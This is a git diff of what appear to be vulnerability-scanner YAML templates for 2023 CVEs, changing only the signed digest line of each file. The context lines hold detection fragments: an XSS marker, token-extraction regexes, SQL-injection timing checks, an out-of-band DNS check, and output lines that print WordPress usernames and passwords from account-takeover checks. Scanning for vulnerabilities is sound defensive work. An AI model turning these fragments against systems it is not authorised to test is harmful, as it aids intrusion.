4b0a00483046022100f19d83d16aea700bb8876d7e1f58abcc0786df511215cc0c133e3c7b2250ee1d022100fea0fcee0010399c905b85d7e5be9106b9b8bcdd2e8d308d5eb3b76f10e636fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index c54f517ac9..dd9f940192 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -61,4 +61,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4b0a0048304602210094e58232de83f801becbcf6c22717a4691a703287bcc2b36cd8324c7b1b505d9022100e1049cf2427b9fa00c2a18680d0f457aa82fcfeed4e5fd5d5e9a4410d9ded8ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100deca6566231b825072b920c7159063966ba0e0d72d70db60a9fa69ae05b1fbe5022073f4adad294645fff730e4db3d3115fd31616a4e889dc68aa57fbafd5817c833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 49f66908a9..bb6939c7ab 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -55,4 +55,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 4b0a00483046022100a261866e35737b0418ff2c7215cdc601df6ef0ab895162ba7ce6bac7708decd8022100a72da53019f2b5c62522cc804d0659adab402a816baa239a94a40e0d943b51d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a12d03c09c04ff3fd0eb21429cffd53dae7683b12ce3bbcf005f8d5e4320dfcd022100ac9beadeb589b7538505258a13544fe51ef33ad0ec8300d92680d1121b40dc06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 500bf7323c..5135678151 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d1efdca0c2fbc6b5558c37cc9dd78325b8dbf80b49de4ee6fe8e27f0ef6bf2ae0220670090be7af0d035831a36668c05f7f0ba146294a2a9c121ce4caf3a1087e27b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b34b512d32b022e240aa98f18a8d87185f4225c0d321f534cfa85def4ee3bc8602202a38b89f5ae73498ed2709a3fd2ad2b98df29a16fc00c3b155cf941e5d1b3276:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 9a8ff214d2..8da52852e0 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -80,4 +80,4 @@ http: - 'duration_1>=6' - 'contains(body_2, "Jms Blog")' condition: and -# digest: 4a0a00473045022100b9f9b8cc6b64a6d4a7f59d009c1b93c8e00bf31220947f1984254c5ffda4601c022017fb76e27e4d3550f19969a20b834066f6ed8bca4aa11e7fbde5f3b6122e0068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210081fd270095a1404c3f7c68821fe46c6300eebf304f7a30088cec551889da6164022100ab7775c739fdba4a50da051bb34459f44f5affaff61c41d0febd3e14967c7bdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 759e960f3e..7b63a1626c 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022076e76878d71cc987d174c4980b0c10f4426b3f1050ada1ac02ef8c56c3f7cf0f022100c098dff6f9f09131be585e6a8a30ec95c04a162f4fef491954246e2589600b37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9f53e3e452787d9724750d3608ce6b68eb37eb2bed9e816ce331a5b6b096969022100a08d99c502029867566a633e6b96973ec21e625d67f3506e7a58117d32a30a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 9d3fb87c97..01e85a8015 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -71,4 +71,4 @@ http: regex: - '>PHP Version <\/td>([0-9.]+)' part: body_2 -# digest: 4b0a00483046022100f939478ed36729ebe31a87abd698959d969018f5f68fd16a7694b5a6423a5700022100912c77b03f59f6010f1d85a4a9e8531bebc76138b5bc197ea7ee70a9b7225189:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220786d7c2a2e607ddcae695760633ce2fa3d1f8acd176f947e34e32b3b6e979f780220653af3d4cfc548d7a3c4e8873b45fd038152bf4a4b6496bd1376574cc0129caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 352a335259..62f3c07e1d 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e6a1f6e756928e45db18a45320a51c3191a59a2165af68f9cd72cc51a032a05702203499f8275fb84f944d66f9651222fd5ec370b7c3b03d5c5dda6f476f8a46f5d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9873ef2152bc24254405f66645dfe7d2f2126dd9d33407920ae3ac8b62a0f6e022100ea81d9a3cfab7defcab09ea9b1fc09ccb7090879ae84b763241e3f4c7896beac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index c4177f7b02..b032894442 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022029f301cf29b926bdabfb9426d69ea575bb173392c90725bfbc2a01e324da924d022100d346c51cf7aded30d36b22230e005d3b2e4c38089a1405db7efe48369fb21ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e004c348a677bde325cd7abafaf76c6c1c5598d263de7b08ffedf49727b2bdb022051961d005e215d78fbc7abd5a6e925cf4a14ae704d246efec0d8522a611ea34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index 3cc961877d..17d60d99f0 100644 --- a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206727d9c61962d5300fd5b2e80c64bd6dba7697219ef8cef1df9686f5eaac0400022004ad7a8569d880dc93cd61f8388bef34156d13f5a4fb02f578fb2d252ae5a0c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009203ff14f4788be7f710de96ec1e65ac2311d0637c4281a015d9226ca1709ea2022100a98a180fc53a625defdcb5d20cf9af65a80367a6b3038691639b348e439fcf35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index 17882416b5..2d36abfdb0 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -38,4 +38,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(base64_decode(body), "PrestaShop", "") && contains(body_2, "facebook_urls")' condition: and -# digest: 4b0a00483046022100c42c09c183478ad1c7af0d8958f5a2ce155e31792410fb6aa4f9c503135fa012022100f3724406bd9c7448b30f307d4640eba3c62aaad6f86f76e4891bfeedb18aa11b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fbf4beb7caa46ad11a7ce26fdbfaa88016713b04d71ece5c2635a31913986a8a022003212b2b9c49bf77654e33bcb134a805bf48735fe3d357705f393d0f741b050e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 48929b3a2f..be8fddcd78 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a462fc483e81b3ddee78aa18d18ae92e4a7b930b20c131ac8879ca6039d05b120220675efd2ca04ea806a1992fb3ff9880d215a94c315a5ef678015f0f95815a4a4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096c8ac8513c2959653cc0dbb1254ba29a23c8f656c9386fc58765c9cdfc94a3a022100e79e136345ab9f545e2ae7c9bddddd959e9663aa61fd706c65902efa636d7c59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 1f36c26132..9d5d3d5ce8 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -72,4 +72,4 @@ http: dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password' -# digest: 4a0a00473045022069c94426f5518f5121657b18326042df0413cef41b5c8f6d880428051588cbc2022100d32e18a5f777f22158a9e64b86f064689d33923d27d9f8398e57d63cb7442e57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f8fb3d0297a76be68c1aaf7e1947bdcc2d20b4194a143aed488388dda746e1b022100eba2f04ded607ea70367c52c9db1c815ddcf252eb554d4b7413373f5073c53be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index 982957da93..c35c2de2ca 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220353e72fc54d1a5b100286cee5205270a211ee4d0762221733020e8944acf0188022100f20547293f89039e181c52e6114d5fa041471da7a0220c1f3893e93bd9c9af18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100867ffb49a0eda2059b75af70ac9ec0eda4767fde5735118fc96a82a2276abbeb022009ab8b1e54d2866629f2bc73bd048266c2f69b84c1c82c83d02e824b7ad2bae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 958238538d..0031bfccae 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -210,4 +210,4 @@ http: - '"url":"\/uploads\/([0-9a-z]+)\/' internal: true part: body -# digest: 490a00463044022065e0d763e79b3f6253f5d71746d01c670351e42faf25dd64c5f03123371ceed602204b64011c3691fb26905431d974c80924d823711ba8fd6963cfe8178eec4d6a4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fce13295307498034c0bfb69917e3f2561064c0812d5c1a8e27c0bcae996910102202f9c489427503620b35cc6d39d3bbc7826a351b2fd88f2c05ef19a5016ccfd70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 74688dc91c..09f5e90b4f 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -59,4 +59,4 @@ http: - status_code == 500 - contains(body, 'critical error') condition: and -# digest: 4b0a00483046022100897f4b8dcfa22ad10a9b4881331ba0166610d2d1f177506cf60e47094c3bfbea022100b256673611bdf13504dc6bf1875ba960441fb7f9bb60ec748474e98d2c76d3fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220701c3e510171597b0328578de16d4891aa76d61b63459dc89839d25b3c9b65fc022003b91c82fa884ae8a5139739fddafa97aa75fcade9da5da3c7781d8ab95d07d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 24bf7925eb..f8d3819e51 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -79,4 +79,4 @@ http: kval: - admpcsrf part: header -# digest: 4a0a0047304502203d4267897f8296511f8a494c98475544751d5e880161faac63cd9f8347147138022100b73532c3e610715de5695219c06e52f99a1fd1e60301f7cf8f259ddb5fb352f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002ea2f37839931bbb9a9c24fbf58223344569d7d295c6bd5820a686bf488e79e022100c8f6cf28389ef9d5215945629bfaefe1adc0cc3089553c0b049600c78a8be185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index a6203187f8..7bbaaffeb2 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -50,4 +50,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and -# digest: 4b0a004830460221009a5cb84bbe960b16d06215918702aa4886b81126c7f360200a9308a774b84558022100a1c7cb3ca634b91f17af1c06ac362e7538ef9d5895fd9785be77c0d4c0368675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082b4c6e19acbd6bc2d2776e029a0c8543657d42b874ca648fef7b0cf47d5dd43022100d87b306d094f7b7d7be74eb279feb8df0607d5454f6bf71f832f9259e2297d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index e2487fc8d4..cb8b18243d 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201f1f96cc5423bdd7d6aba90aeb5ee5cb922ee5c40b7f3d28e770ee1213d1251f0220491e89f5085f686f7a177dd699e09591d72a98fc75464e6d3dadc778e5fef41c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051404fd5879c74f26f3e3d20328728775676899601fe56240a8c3865b521c780022100c0508c953de3425517b071c0abbd29036e2b125ba1af7a21b20557e1107caf9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 76d24f3381..1a3abb4abe 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 400 -# digest: 490a00463044022060c7afe6483e14393aa8342e68e85acbe18a16fb49095f519bbe982b0f80b90b022008e24f9c541e4dad17f21d6eed23ba2aa425ef6ce0d26a5800e26cd17e7cf198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5f2770de55ff7f26ab190c3f17825a83eb4c744645440823f07effa82fd1e210220102cf078e3b1ddb464125a3ead3543525628993b5cecad9daaa727f7aa5d3f3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index c8cd03f791..2875a9c12c 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100f2dfd1b04a176946c59db68f86b858bfb632b774ad28f136181e10f4d143e61d02201e9ed4180e8b57869195f12a8f73d8d4d14c503cbfa220cd4ea95fde138cd90c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afeced594594dd08a04c07ba80120871493fa8c243e6b0ef758019f4c205e85b02200230f234069d1a181ab48796a446082f79a84ea10df897f4a908d19937430551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index 7464942b5d..50f4f54e0d 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 422 -# digest: 4a0a004730450220676c7e539478049c7e701f24f734988e87d1e147eeca0a8120e4ae41f81f7589022100824b644c9d095938af6deb899baf40444a816b7d20725861dd6ea537656892ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3383f2fbe7492efe4c31cc6431f25c5c5452d34e74b93108f7c4b44ed91fdd40221009ac4be31a0cff9f9737fcf1893fa400e0933a2863cec4612c7640ea4081d6c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index c1f68d1230..b2d26e1d2f 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -47,4 +47,4 @@ http: - 'duration_2>=6' - 'contains(tolower(response_1), "prestashop")' condition: and -# digest: 4a0a00473045022100d593029b424dd6ad16f43d82e3a54cba3cd8b9c934ee5e3ae8eb330653f3859e022045bbd51acba15bf81996e726e8b7f6b0cae2d23f3d9e20ba9a7b4ef1f2cf5dc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f8f5546a345ebd6679d7326c8be4fdd9b4634f7da41d4e2a2371aa32354f8eb0221009d47704569e5ce942252fde8c0426bb71442d5f994d5aba7fb3f593b0e865e0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 99d71ab1b0..6537669de8 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e05a266d9d55fd3a38f9d8677c9d9e4450c32bef963f5218d115746e19fb183b022100df6c3fa64ca9d12a2bab4a682a6f2c1d0a72c81e9190b54a83cccbac17ac8652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220634ca8a4ffd62bcb105aa07c8ed88c6b4c618002ce8971aed027cc69314c0293022100fcef9a2e98705ea6414ef80562a5b57e55c0340f6d7cf6020b1361769ebd8faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index 8a419d9718..f760b82b3d 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022057d4766234c62962011e978bace51bda6de87bf47c67a73e6fdc155f65f53c40022100e5b37232899cce135c313a5839444060f29eba8fd9219414a66f59ee3f289443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a271284d69cac1f4f872b9bff6588e356c8648cf640264b5606b808c55a3cfbd022100fb26ec06577c0fb74a98f0ba3f0cb1fda60beb381bb735d688514022df6bf3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index 5118d7e845..a3784c4e80 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Advanced Custom Fields")' condition: and -# digest: 490a0046304402204a1e383a82e9becfedda3d54090ef09ef0340f97ffaf84b59a6d73d57e68e61802202406638c30eee8b882e074c38d497cb3cf257cc827c172860027a1a13a1a7214:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056850f415fae2d0929dad93fe10665c4ffa3942c147dfc81c7ebf791f92ac5b50220214d9094cddb98c12f33f8027ead5c1b1977b3ac248e35474df4173260e464fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index c7c2893b9b..5622e5128f 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -78,4 +78,4 @@ http: regex: - 'name="logintoken" value="([a-zA-Z0-9]+)">' internal: true -# digest: 4b0a00483046022100b499b0cff5670c4dca6ee1a909d0c3cb3d324d3d817c7ddcffb80d7430d27026022100c1c23962d506778e54f4fafa01819bcec1d3cc09408d538853e0501bd5ca90fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f298a6e3c9630e270f965e1eb76ad282dc1013c066ba86b81ca984e5c759221022100b3cadd4c5e1edc8028ee6372aa7c634e053893e68cee34de8fdc2e8ce44c75cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index f4614c2467..40e72fb07b 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd0910344a01befa8bac20cea11fbda7bce5879983bf65b20475022ffde7da51022100da4e1520b0e566063fdb239c7e5d1a572efd12f9c6dab538482585773329a955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de57a10bfb7f4faa9acd530eede927372fc258914a5d1f5fa476a9317bea80db0220635e62864d2ab58097102400c7516d610bdd42516cbb280f12aab1e009a3b21b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index c246ed5d97..9578cfe944 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -108,4 +108,4 @@ http: - type: dsl dsl: - '"WP_USERNAME: "+ wordpress_username + " WP_PASSWORD: "+ password' -# digest: 4a0a004730450221009ceeb18de37e91b63f3a61d9d638039c935a6ad1cdc168dec3087769f8b38c55022028ca0206f77fc5f6ce9c627fccdf053a860af3584236f1455045241f631c3bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a26b83d631646ec09af3af65eb293c9a3f3761a84afecbfca21c5e8f0973d6fe022064a99db818cef379e23b844ee31a73da1796fdad71351add8163625aaf7e6a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 56cb5bd990..11bb3d3bb4 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202042a13e22b97fab6076e0d4656907b4b24e6f63745278256ca572bc3d7c00d4022100cc7b62100b0bb6025395f6c912decd7ad8a70841ef677f8a9fae8d867705f791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5147f2bcdbc971c4379421b14ab15063e084d6306980cdb019ce3ed33fed2f1022100d73fa5942f5f3dd8d26a3c3438a85f0ddfbe1153c06e0136275336131a1788e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 92442772ec..8b70377236 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -57,4 +57,4 @@ http: part: body_2 words: - "CVE-2023-32563" -# digest: 490a004630440220277c51026fc6ee497604b9edf835b895ebb5f041702564b51386e1aff926cdd502206a64318799d865c7590bca991daf364669b8257fa8d74439d3aada9f801eb608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ef41427803cc77d9625eb96fcb7415c04bb9cdb0cc70363d165754c36f0c44902204d3a8adef4461aac1fac0b12e9ce6ec990138f2a800440d04195167b5401293a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index ed985c266a..249fe93d11 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -47,4 +47,4 @@ http: - 'contains(body_2, "Change Password")' - 'contains(body_2, "Old Age Home Management System|| Dashboard")' condition: and -# digest: 4a0a004730450220313b0ce72dd3e69a9ac5f9b60a7d8f372af297afeff81bf39f192ec93cbdf95702210080b1dd89d72df32023c5cb4db152ce6a8787825aaf0d96dd5d0cc89b4cd69900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049057b44ba68b587a1d00ddececb11eb4b27973f9ed5ba5245e260357d80f01e022100c0abd873024b519872465347f63f229d7d4f19a80fa3fefb6e91f5645122b483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 6612c7e423..804a38e40c 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -48,4 +48,4 @@ http: - 'contains(body, "Fatal error:")' - 'contains(body, "XPATH syntax error:")' condition: and -# digest: 490a004630440220750341ccac4ba99ec9dccad1ab7517f66f0bb899dc2d12b9ab7d04ceb9480ffe022002d0bcdc677425a24adcdf761c3f6a85454a9230f235a27dcfe3a4834a4624bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038e305e1a427828938e09914041e2f6b067eac093c57894b8e785e2226c492120221009c7b52f37dbe1da9686032f5a6807f5ebe4accd86ee5119086ce69fb0d806439:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml index 3c522da41b..2d6c0d98ac 100644 --- a/http/cves/2023/CVE-2023-33584.yaml +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -46,4 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100d92fe2f3b88a43f09bd562da512dbe3ac9126ca89556e975743d69c63d184cbd0220343343c309427c6671a195932b6c4eca060d5eae5490ca528e75617c05dc2eec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f40626ab7516149dc904a0b037b08e20f1600b2c5120af0de3a1ae0c7734d740220179ff4ff2a58eb3877f3c34bb4da803721baf5aeb1e1f69ace56203fd229a98a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index d9d0e70609..9d1ec8f566 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -48,4 +48,4 @@ http: - status_code_2 == 200 - contains_all(body_2, 'www', 'www_multi') condition: and -# digest: 4b0a00483046022100a5a5997bf1199eef2ac3d31ff80c0f9609221d0b4e12367358b9d76cf0c0df36022100fb5e6fd8f1d4683376d36cdd456ff9050c22f75f86e03c1abeeed0c90bd884e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6854bf0faa5050128ca42d2d2ee3d37b3e95d98ee44027b193290a3cb94d1690221008fc6436949fc3b2d1ec7052d3740326ec505a58597f35ba52a30bae0163b9a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index ec43576005..e5f230a074 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -90,4 +90,4 @@ http: group: 1 regex: - "getPwdHash.*,'([0-9]+)'" -# digest: 4a0a00473045022100cfef4991a02bb1fb4d0b1b8b358c107100a57b840a686c7326e4cec2a0eaea4002205d9e32477ec23b217fb637a500548d03c2f58b21b9685b9232b439a9985cf674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dff5af913f6255a502dbf50816f39ec4a629ff0e3275b9fd2aa5c0d742b9a85202207d90e978f0d17059baa99aac6f41112ed07e6dda4ec8b392b8ed6ea5956c3716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index dc395c3721..339c29a255 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 